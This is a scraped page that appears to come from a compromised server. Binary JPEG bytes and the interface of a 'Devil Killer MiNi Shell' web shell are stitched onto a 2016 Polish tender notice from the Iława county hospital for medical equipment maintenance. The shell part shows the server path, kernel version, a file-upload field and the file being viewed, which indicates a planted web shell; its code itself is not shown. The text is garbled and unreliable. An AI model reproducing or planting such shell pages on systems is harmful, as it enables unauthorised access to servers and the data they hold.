JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160209/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160209/28032-N-2016.html

<p class="kh_header"><b>Iława: Wykonanie usługi: przeglądów i konserwacji urządzeń medycznych w Powiatowym Szpitalu wraz z wymianą materiałów eksploatacyjnych przewidzianych do wymiany w ramach przeglądów i konserwacji przez producenta sprzętu w celu dopuszczenia sprzętu medycznego do dalszego użytkowania przez okres 36 miesięcy oraz zapewnienie pełnej opieki serwisowej nad skanerem rtg przez okres 12 miesięcy z podziałem na 22 zadania oraz w Powiatowym Szpitalu im. Władysława Biegańskiego w Iławie nr sprawy 2/2016</b><br>
<b>Numer ogłoszenia: 28032 - 2016; data zamieszczenia: 09.02.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Szpital im. Władysława Biegańskiego w Iławie , ul. Gen. Wł. Andersa 3, 14-200 Iława, woj. warmińsko-mazurskie, tel. 89 6449601, faks 89 6492425.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> szpital.ilawa.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie usługi: przeglądów i konserwacji urządzeń medycznych w Powiatowym Szpitalu wraz z wymianą materiałów eksploatacyjnych przewidzianych do wymiany w ramach przeglądów i konserwacji przez producenta sprzętu w celu dopuszczenia sprzętu medycznego do dalszego użytkowania przez okres 36 miesięcy oraz zapewnienie pełnej opieki serwisowej nad skanerem rtg przez okres 12 miesięcy z podziałem na 22 zadania oraz w Powiatowym Szpitalu im. Władysława Biegańskiego w Iławie nr sprawy 2/2016.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie usługi: przeglądów i konserwacji urządzeń medycznych w Powiatowym Szpitalu wraz z wymianą materiałów eksploatacyjnych przewidzianych do wymiany w ramach przeglądów i konserwacji przez producenta sprzętu w celu dopuszczenia sprzętu medycznego do dalszego użytkowania przez okres 36 miesięcy oraz zapewnienie pełnej opieki serwisowej nad skanerem rtg przez okres 12 miesięcy z podziałem na 22 zadania w Powiatowym Szpitalu im. Władysława Biegańskiego w Iławie nr sprawy 2/2016

Zadanie nr 1 Przeglądy techniczne aparatu rtg DX-D400 i skanera 
Zadanie nr 2 Przeglądy techniczne aparatu rtg
Zadanie nr 3 Przeglądy techniczne aparatów do znieczulenia
Zadanie nr 4 Przeglądy techniczne defibrylatora CardioAid
Zadanie nr 5 Przeglądy techniczne cyklometrów
Zadanie nr 6 Przeglądy techniczne kardiomonitorów 1
Zadanie nr 7 Przeglądy techniczne lamp do fototerapii
Zadanie nr 8 Przeglądy techniczne kardiomonitorów 2
Zadanie nr 9 Przeglądy techniczne aparat elektrochirurgiczny 
Zadanie nr 10 Przeglądy techniczne lamp operacyjnych
Zadanie nr 11 Przeglądy techniczne myjnia automatyczna
Zadanie nr 12 Przeglądy techniczne parowników
Zadanie nr 13 Przeglądy techniczne sprzęt różny 1
Zadanie nr 14 Przeglądy techniczne sprężarek
Zadanie nr 15 Przeglądy techniczne respiratorów
Zadanie nr 16 Przeglądy techniczne sprzęt różny 2
Zadanie nr 17 Przeglądy techniczne aparaty rtg
Zadanie nr 18 Przeglądy techniczne stół operacyjny
Zadanie nr 19 Przeglądy techniczne aparat USG
Zadanie nr 20 Przeglądy techniczne konsola
Zadanie nr 21 Przeglądy techniczne napęd drzwi
Zadanie nr 22 Przeglądy techniczne i pełna opieka serwisowa skaner
1.	W skład przedmiotu zamówienia wchodzą w szczególności:
1.1.	 Zadania od nr 1 do nr 21 Przedmiot zamówienia obejmuje wszystkie niezbędne czynności wymagane w celu dopuszczenia w/w urządzeń medycznych do dalszego użytkowania zgodnie z instrukcją obsługi producenta sprzętu, w szczególności:
a)	sprawdzenie sprawności techniczno - eksploatacyjnej urządzeń objętych niniejszym zamówieniem,
b)	konserwację i zachowanie gotowości eksploatacyjnej opartej o zalecenia Zamawiającego,
c)	przeprowadzanie okresowych przeglądów i kontroli stanu technicznego sprzętu medycznego,
d)	prowadzenie paszportów technicznych sprzętu medycznego tj. wprowadzanie każdorazowo wpisu o wykonanych czynnościach, uszkodzeniach oraz o dopuszczeniu lub nie urządzenia medycznego do dalszego użytkowania.
1.2.	Zadanie nr 22 Przedmiot zamówienia obejmuje wszystkie niezbędne czynności wymagane w celu dopuszczenia w/w urządzeń medycznych do dalszego użytkowania zgodnie z instrukcją obsługi producenta sprzętu, w szczególności:
a)	Wykonywanie przeglądów okresowych systemu AGFA CR zgodnie z zaleceniami producenta (2 w ciągu 12 miesięcy), po wykonaniu wydanie stosownego certyfikatu
b)	Prowadzenie kalibracji i regulacji urządzenia,
c)	Zdalna diagnostyka systemu,
d)	Koszt robocizny, części zamiennych oraz dojazdu niezbędnych do usunięcia awarii bądź usterki systemu CR wliczony w cenę oferty,
e)	Świadczenie opieki serwisowej od poniedziałku do piątku w godz. 8:00 do 16:00 z wyłaczeniem dni ustawowo wolnych od pracy
f)	Gwarantowany czas usunięcia awarii (awaria oprogramowania lub urządzenia systemu spowodowana jego błędem, uniemożliwiająca korzystanie z funkcji podstawowej systemu): czas reakcji (kontakt telefoniczny) do 4 godzin od zgłoszenia dysfunkcji, podjęcie naprawy zdalnej lub wizyta na miejscu do 48 godzin od zgłoszenia, maksymalny czas usunięcia awarii (w przypadku konieczności sprowadzenia części zamiennych z zagranicy) do 96 godzin
g)	Gwarantowany czas usunięcia usterki (awarii oprogramowania lub urządzenia systemu oznaczająca działanie w sposób utrudniający jego normalne funkcjonowanie): czas reakcji (kontakt telefoniczny) do 24 godzin od zgłoszenia dysfunkcji, podjęcie naprawy zdalnej lub wizyta na miejscu do 96 godzin od zgłoszenia, maksymalny czas usunięcia awarii (w przypadku konieczności sprowadzenia części zamiennych z zagranicy) do 144 godzin
h)	Instalacja poprawek do zainstalowanej wersji oprogramowania NX stacji techników,
i)	Po rejestracji zgłoszenia serwisowego w systemie zgłaszający otrzymuje email potwierdzający przyjęcie zgłoszenia wraz z numerem zgłoszenia,
j)	Po każdej wizycie serwisowej w miejscu użytkowani otrzyma raport serwisowy..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 50.40.00.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 22.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeśli Wykonawca złoży oświadczenie o spełnianiu warunków udziału w postępowaniu zgodnie z art. 22 ust.1 Ustawy Prawo zamówień publicznych</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeśli Wykonawca złoży oświadczenie o spełnianiu warunków udziału w postępowaniu zgodnie z art. 22 ust.1 Ustawy Prawo zamówień publicznych</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeśli Wykonawca złoży oświadczenie o spełnianiu warunków udziału w postępowaniu zgodnie z art. 22 ust.1 Ustawy Prawo zamówień publicznych</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeśli Wykonawca złoży oświadczenie o spełnianiu warunków udziału w postępowaniu zgodnie z art. 22 ust.1 Ustawy Prawo zamówień publicznych</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeśli Wykonawca złoży oświadczenie o spełnianiu warunków udziału w postępowaniu zgodnie z art. 22 ust.1 Ustawy Prawo zamówień publicznych</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.Wypełniony formularz ofertowy 2. Wypełniony formularz specyfikacji przedmiotowej (formularz cenowy)</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 97</li>
<li>2 - Termin płatności - 3</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>17.1 Strony dopuszczają zmiany treści umowy czasowe lub trwałe w trakcie jej obowiązywania,
 w przypadku:
1. zmiana dotyczy nieistotnych postanowień zawartej umowy,
2.  podczas realizacji umowy wystąpią nieprzewidywalne zdarzenia lub okoliczności, jak w szczególności klęski żywiołowe, strajki, zamieszki, konflikty zbrojne, które uniemożliwiają zrealizowanie przedmiotu zamówienia w sposób, w zakresie i w terminie przewidzianym w ofercie.
3. w wyniku istotnej zmiany stosunków spełnianie świadczenia byłoby połączone z nadmiernymi trudnościami lub groziłoby, co najmniej jednej ze stron znaczną stratą, a czego strony nie mogły przewidzieć przy zawarciu umowy - w przypadku istotnej zmiany stosunków takiej jak znaczny wzrost cen surowców, nośników energii itp.
4.zmiana dotyczy obniżenia cen jednostkowych poszczególnych elementów przedmiotu zamówienia 
- w przypadku promocji, ogólnej obniżki cen na dany asortyment itp.
5.dotyczy zmian koniecznych ze względu na zmianę powszechnie obowiązujących przepisów prawa, 
w szczególności stawek podatku VAT, stawek celnych - w przypadku zaistnienia takich zmian.
W przypadku zmiany podatku Vat cena brutto pozostaje bez zmian, zmianie ulega cena netto.
6.konieczność wprowadzenia zmiany wynika z okoliczności, których nie można było przewidzieć 
w ogłoszeniu o zamówieniu lub specyfikacji istotnych warunków zamówienia.
17.2. Wprowadzenie zmian określonych w ust. 2 wymaga uzasadnienia konieczności zmiany i porozumienia stron oraz sporządzenia aneksu do umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.szpital.ilawa.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowy Szpital im. Władysława Biegańskiego w Iławie ul. Gen. Wł. Andersa 3 14-200 Iława Pokój nr 210.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.02.2016 godzina 11:00, miejsce: Powiatowy Szpital im. Władysława Biegańskiego w Iławie ul. Gen. Wł. Andersa 3 14-200 Iława Kancelaria.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Przeglądy techniczne aparatu rtg DX-D400 i skanera.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	   APARAT RTG DX - D400,    nr  G-40045/2012 Agfa Sp. z o.o.	Pracownia rtg	1
2.	 
Skaner CR30-X +NX,  nr 501138 Agfa Sp. z o.o.	Pracowania rtg	1.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.40.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 36.</li></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Przeglądy techniczne aparatu rtg.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	   APARAT RTG  nr 80647, ZIEHM 8000, ZIEHM IMAGING	Blok Operacyjny	1.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.40.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 36.</li></ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Przeglądy techniczne aparatów do znieczulenia.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	   AESPIRE AMXK nr 01502, 2006, DATEX-OHMEDA	SOR	1
2.	AESPIRE AMXK nr 00829 2006, DATEX-OHMEDA	ANESTEZJOLOGIA	1
3.	AESPIRE AMXK nr 01010 2006, DATEX-OHMEDA	ANESTEZJOLOGIA	1.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.40.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 36.</li></ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Przeglądy techniczne defibrylatora CardioAid.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	 Defibrylator BIONET CARDIO-AID nr  10497340   2013 r          	ZESPOŁY RATOWNICTWA      MEDYCZNEGO	1.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.40.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 36.</li></ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Przeglądy techniczne cyklometrów.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	CYKLOMETR                                     SYSTEM REHABILITACJI  KARDIOLOGICZNEJ   164/13  / 2013, 
CRG 200, Aspel S.A.	REHAB.  KARDIOLOGICZNA
	1
2.	CYKLOMETR                                     SYSTEM REHABILITACJI  KARDIOLOGICZNEJ   165/13  / 2013
CRG 200, Aspel S.A.	REHAB.  KARDIOLOGICZNA
	1
3.	CYKLOMETR                                     SYSTEM REHABILITACJI  KARDIOLOGICZNEJ   166/13  / 2013
CRG 200, Aspel S.A.	REHAB.  KARDIOLOGICZNA	1.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.40.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 36.</li></ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Przeglądy techniczne kardiomonitorów 1.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Monitor CAM S/5   nr 6152787 F-CM1/2006
Datex-Ohmeda	ANESTEZJOLOGIA
	1
2.	Monitor CAM S/5   nr 6152814 F-CM1/2006
Datex-Ohmeda	ANESTEZJOLOGIA
	1
3.	Monitor CAM S/5   nr 6152816 F-CM1/2006
Datex-Ohmeda	ANESTEZJOLOGIA
	1
4.	Monitor CAM S/5   nr 6311586 F-CM1/2006
Datex-Ohmeda	ANESTEZJOLOGIA
	1
5.	Monitor FM S/5     nr 6141883 
Datex-Ohmeda	ANESTEZJOLOGIA
	1
6.	Monitor FM S/5     nr 6141895 
Datex-Ohmeda	ANESTEZJOLOGIA
	1
7.	Monitor  S/5    nr 4865586  S5CCM Datex-Ohmeda	WEWNĘTRZNY	1
8.	Monitor  S/5    nr 4871892  S5CCM Datex-Ohmeda	WEWNĘTRZNY	1
9.	Monitor  S/5    nr 4871904  S5CCM Datex-Ohmeda	WEWNĘTRZNY	1
10.	Monitor  S/5    nr 4871906 S5CCM Datex-Ohmeda	WEWNĘTRZNY	1
11.	Monitor  S/5    nr 4871911  S5CCM Datex-Ohmeda	WEWNĘTRZNY	1
12.	Komputer centralny nr 8226JYFG  C - NTNET Datex-Ohmeda	WEWNĘTRZNY	1
13.	Monitor CAM S/5    nr 6152815 
F-CM1/2006 Datex-Ohmeda	   SOR
	1
14.	Monitor FM S/5  nr 6141890
  F-FM-00 Datex-Ohmeda	O. Chirurgii Uraz. Ort.	1
15.	Monitor FM S/5  nr 6141882
FF-FM-00 Datex-Ohmeda	O. Chirurgii Uraz. Ort.	1.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.40.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 36.</li></ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Przeglądy techniczne lamp do fototerapii.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	DIODOWA LAMPA do FOTOTERAPII 
BILITRON 3006 BTP AAF 55860
DUTCHMED	POŁOŻNICZO-NOWORODKOWY	1
2.	LAMPA do FOTOTERAPII
BILIBED 1301713 MEDELA	POŁOŻNICZO-NOWORODKOWY	1.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.40.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 36.</li></ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Przeglądy techniczne kardiomonitorów 2.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Kardiomonitor  1987 Diascop -2
S&W Biazet	REH. KARDIOLOG.
	1
2.	Kardiomonitor 1986 Diascop -2
S&W Biazet	REHABILITACJA
	1
3.	Kardiomonitor  C3 / 2004  Philips	O. PEDIATRYCZNY
	1
4.	Kardiomonitor Dash 400/2004 
GE Medical	POŁOŻNICZO-NOW.
	1.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.40.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 36.</li></ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Przeglądy techniczne aparat elektrochirurgiczny.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	APARAT  ELEKTROCHIRURGICZNY  nr 500331
SPEKTRUM EMED	BLOK OPERACYJNY
	1.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.40.00.00-9.</p></li>
